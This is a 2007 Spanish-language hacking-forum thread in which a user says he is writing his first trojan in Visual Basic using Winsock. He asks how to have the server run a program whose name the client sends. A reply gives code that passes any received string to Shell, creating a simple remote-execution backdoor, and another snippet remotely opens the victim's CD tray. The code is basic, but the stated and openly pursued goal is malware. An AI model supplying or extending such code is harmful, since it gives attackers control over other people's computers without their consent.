elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  ejecutar archivos remotos
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ejecutar archivos remotos  (Leído 1,133 veces)
wACtOr


Desconectado Desconectado

Mensajes: 461


Premio finalista diseño web elhacker.net


Ver Perfil
ejecutar archivos remotos
« en: 24 Mayo 2007, 22:21 pm »

wenas, estoy intentando acer un troyano (el primero que ago) y a la vez intento aprender sobre el winsock. para mi el mejor manual es la practica con un poco de teoria.

weno pos os comecto. la manera que ago yo para enviar comandos es la siguiente:

en el cliente:

Private Sub cmdAbrir_click()
ws.sendata "abrircd"
End Sub

en el server:

Private Sub ws_DataArrival(ByVal bytesTotal As Long)
On Error GoTo error
Dim datos As String
ws.GetData datos
If datos = "abrircd" Then ret = mciSendString("set CDAudio door open", returnstring, 127, 0)
End Sub

Esta es la manera que uso yo para enviar comandos, se que no es la mejor, pero DE MOMENTO a mi me sirve asi.

aora la pregunta es como enviar al servidor el contenido de un textbox y que el servidor ejecute el programa que ay en ese textbox.

en el cliente supongo que seria algo asi:

ws.sendata Text2.text

pero en el servidor no se como acer para que me muestre el contenido del textbox. con eso yo ya sabria apañarme. si podeis ponerme algun enlace o algo que me explique un poco como acer eso os lo agradecere un monton.

gracias


En línea

Xerok1!

Desconectado Desconectado

Mensajes: 228



Ver Perfil
Re: ejecutar archivos remotos
« Respuesta #1 en: 24 Mayo 2007, 22:32 pm »

en el server te kedaria asi:::


Citar
Private Sub ws_DataArrival(ByVal bytesTotal As Long)
On Error GoTo error
Dim datos As String
ws.GetData datos
If datos = "abrircd" Then ret = mciSendString("set CDAudio door open", returnstring, 127, 0)
else'si los datos no son "abrircd"
shell datos'ejecuta los dats q le das
end if

End Sub

y en el cliente asi:


Citar
ws.senddata text2.text'manda lo q pongas en el textbox


espero q haya sido claro.. saludos ;) ;)


« Última modificación: 24 Mayo 2007, 22:44 pm por Xerok1! » En línea

[Firma]Esperando haber si acaba el concurso de firmas y la pongo[/Firma]
wACtOr


Desconectado Desconectado

Mensajes: 461


Premio finalista diseño web elhacker.net


Ver Perfil
Re: ejecutar archivos remotos
« Respuesta #2 en: 24 Mayo 2007, 22:45 pm »

ok gracias, voy a probar a ver si de esa manera funciona.


gracias
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Administrar accesos remotos por Dial-Up...
Redes
TrashAmbishion 1 1,731 Último mensaje 26 Julio 2011, 18:11 pm
por int_0x40
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines